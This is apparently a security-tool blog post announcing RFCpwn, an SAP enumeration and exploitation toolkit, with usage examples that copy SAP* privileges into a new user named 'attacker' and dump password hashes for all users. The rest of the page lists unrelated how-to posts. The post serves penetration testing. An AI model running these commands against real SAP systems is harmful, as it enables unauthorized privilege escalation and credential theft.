RFCpwn : An Enumeration & Exploitation Toolkit Using RFC Calls To SAP

RFCpwn is an SAP enumeration and exploitation toolkit using SAP RFC calls. This is a toolkit for demonstrating the impact of compromised service accounts. This PoC is not for use in production environments, no guarantee of stability or support.

It relies on the pyrfc and the libraries provided by SAP in: https://github.com/SAP/PyRFC#installation

Also Read – AWS Report : Tool For Analyzing Amazon Resources

Examples

Ping – confirm connectivity

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

Copy a users rights into a new dialog user. If -copy is not specified SAP* is used.

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

Dump hashes from all users. option -exp for experimental bcode & passcode hashes.

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump

Demo

Download

HackTheBox AD Machines : Tools And Strategies For Mastering AD Penetration Testing

February 7, 2025

In "Cyber security"

HackerToolkit – Your Comprehensive Arsenal For Ethical Hacking And Penetration Testing

May 6, 2024

In "Cyber security"

AD_Enumeration_Hunt – AD Pentesting Toolkit

August 25, 2023

In "Cyber security"

R K

Next Dsync : IDAPython Plugin That Synchronizes Disassembler & Decompiler Views »

Previous « LKWA : Lesser Known Web Attack Lab

Published by

R K

Tags: EnumerationRFCRFCpwnSAP

6 years ago

Best OSINT Tools for Journalists 2026: Verify Sources, Images and Claims

Journalists use OSINT to verify public information before publishing. In 2026, misinformation, AI-generated images, fake…

5 hours ago

How To

Install Docker on Ubuntu 20.04: Complete Step-by-Step Guide

Docker is an open-source platform that lets you package and run applications inside containers. Each container…

15 hours ago

How To

Install PostgreSQL on Ubuntu: Database Setup and Admin Guide

PostgreSQL (often called Postgres) is an open-source relational database system. It supports advanced features like JSON…

16 hours ago

How To

Install Xrdp Remote Desktop on Ubuntu: Setup and Connect

Xrdp is an open-source server that lets you connect to your Ubuntu machine from another computer…

16 hours ago

How To

Tomcat 9 on Ubuntu 20.04: Install, Configure, and Start

Apache Tomcat is an open-source web server and Java servlet container. It is one of the…

16 hours ago

How To

Automatic Updates on Ubuntu: Set Up unattended-upgrades

Keeping your Ubuntu system updated is one of the best ways to protect it. Security…

17 hours ago

RFCpwn : An Enumeration & Exploitation Toolkit Using RFC Calls To SAP

Related

HackTheBox AD Machines : Tools And Strategies For Mastering AD Penetration Testing

HackerToolkit – Your Comprehensive Arsenal For Ethical Hacking And Penetration Testing

AD_Enumeration_Hunt – AD Pentesting Toolkit

Recent Posts

Best OSINT Tools for Journalists 2026: Verify Sources, Images and Claims

Install Docker on Ubuntu 20.04: Complete Step-by-Step Guide

Install PostgreSQL on Ubuntu: Database Setup and Admin Guide

Install Xrdp Remote Desktop on Ubuntu: Setup and Connect

Tomcat 9 on Ubuntu 20.04: Install, Configure, and Start

Automatic Updates on Ubuntu: Set Up unattended-upgrades

RFCpwn : An Enumeration & Exploitation Toolkit Using RFC Calls To SAP

Related

Related Post

Recent Posts

Headline